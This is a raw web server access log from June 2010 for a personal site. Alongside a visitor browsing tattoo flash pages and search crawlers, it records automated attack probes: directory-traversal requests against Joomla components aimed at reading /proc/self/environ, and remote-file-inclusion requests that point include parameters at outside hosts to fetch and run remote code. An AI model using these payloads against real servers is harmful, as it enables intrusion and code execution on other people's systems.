174.142.75.115 - - [30/Jun/2010:19:50:42 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:19:50:46 -0500] "GET /logs/access_log.1276214400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:19:50:52 -0500] "GET /logs/access_log.1275782400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:19:50:52 -0500] "GET /index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:19:50:52 -0500] "GET /logs/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:19:50:55 -0500] "GET /logs/access_log.1276214400/index.php?option=com_otzivi&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
89.108.64.192 - - [30/Jun/2010:19:53:02 -0500] "GET /logs/access_log.1275609600///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 363 "-""libwww-perl/5.812"
89.108.64.192 - - [30/Jun/2010:19:53:02 -0500] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
89.108.64.192 - - [30/Jun/2010:19:53:03 -0500] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 341 "-""libwww-perl/5.812"
69.73.155.53 - - [30/Jun/2010:19:54:14 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.73.155.53 - - [30/Jun/2010:19:54:14 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.155.53 - - [30/Jun/2010:19:54:14 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.73.155.53 - - [30/Jun/2010:19:55:05 -0500] "GET /logs/access_log.1274572800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.73.155.53 - - [30/Jun/2010:19:55:05 -0500] "GET //index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
69.73.155.53 - - [30/Jun/2010:19:55:05 -0500] "GET /logs//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
69.73.155.53 - - [30/Jun/2010:19:55:54 -0500] "GET /logs/access_log.1277164800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
69.73.155.53 - - [30/Jun/2010:19:56:45 -0500] "GET /logs/access_log.1277164800//index.php?option=com_hsconfig&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
92.246.14.10 - - [30/Jun/2010:19:59:26 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:26 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:26 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:26 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:26 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:27 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:27 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:27 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:27 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:27 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:27 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:27 -0500] "POST /contact.php HTTP/1.1" 404 295 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:27 -0500] "POST /logs/contact.php HTTP/1.1" 404 300 "-""Casper Bot Search"
92.246.14.10 - - [30/Jun/2010:19:59:27 -0500] "POST /logs/access_log.1266710400%20%20/contact.php HTTP/1.1" 404 324 "-""Casper Bot Search"
184.77.193.254 - - [30/Jun/2010:20:00:32 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?q=vintage+tattoo+flash+site&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:32 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:41 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:42 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:42 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:42 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:42 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:42 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:42 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:42 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:42 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:43 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:43 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:43 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:00:45 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
174.142.75.115 - - [30/Jun/2010:20:01:54 -0500] "GET /index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:20:01:54 -0500] "GET /index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
184.77.193.254 - - [30/Jun/2010:20:02:53 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:53 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:54 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:54 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:54 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:54 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:54 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:54 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:54 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:54 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:02:54 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:28 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 1778 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:28 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:28 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:28 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:28 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:28 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:28 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:29 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:30 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:30 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:03:30 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
72.30.142.216 - - [30/Jun/2010:20:03:35 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.142.216 - - [30/Jun/2010:20:03:36 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
184.77.193.254 - - [30/Jun/2010:20:04:04 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:04 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:04 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:04 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:04 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:04 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:04 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:05 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:05 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:05 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:04:05 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:05:01 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:05:01 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:05:01 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:05:01 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
184.77.193.254 - - [30/Jun/2010:20:05:22 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
67.195.112.180 - - [30/Jun/2010:20:09:21 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 304 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.234.100.196 - - [30/Jun/2010:20:09:24 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:20:09:25 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:20:09:26 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:20:09:31 -0500] "GET /logs/access_log.1275696000/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 311 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:20:09:32 -0500] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1003 "-""libwww-perl/5.805"
211.234.100.196 - - [30/Jun/2010:20:09:33 -0500] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 11614 "-""libwww-perl/5.805"
207.46.199.199 - - [30/Jun/2010:20:11:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
93.186.192.124 - - [30/Jun/2010:20:11:36 -0500] "GET /logs/access_log.1266710400%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
93.186.192.124 - - [30/Jun/2010:20:11:37 -0500] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
93.186.192.124 - - [30/Jun/2010:20:11:37 -0500] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
93.186.192.124 - - [30/Jun/2010:20:14:05 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
93.186.192.124 - - [30/Jun/2010:20:14:05 -0500] "GET /logs/access_log.1274572800%20%20//admin/business_inc/saveserver.php?thisdir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
93.186.192.124 - - [30/Jun/2010:20:14:05 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
87.106.247.246 - - [30/Jun/2010:20:19:09 -0500] "GET /index1.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
87.106.247.246 - - [30/Jun/2010:20:19:09 -0500] "GET /index1.php?option=com_webeecomment&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:20:19:36 -0500] "GET /logs/access_log.1277424000/index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:20:19:36 -0500] "GET /index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
174.142.75.115 - - [30/Jun/2010:20:19:36 -0500] "GET /logs/index.php?option=com_letterman&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
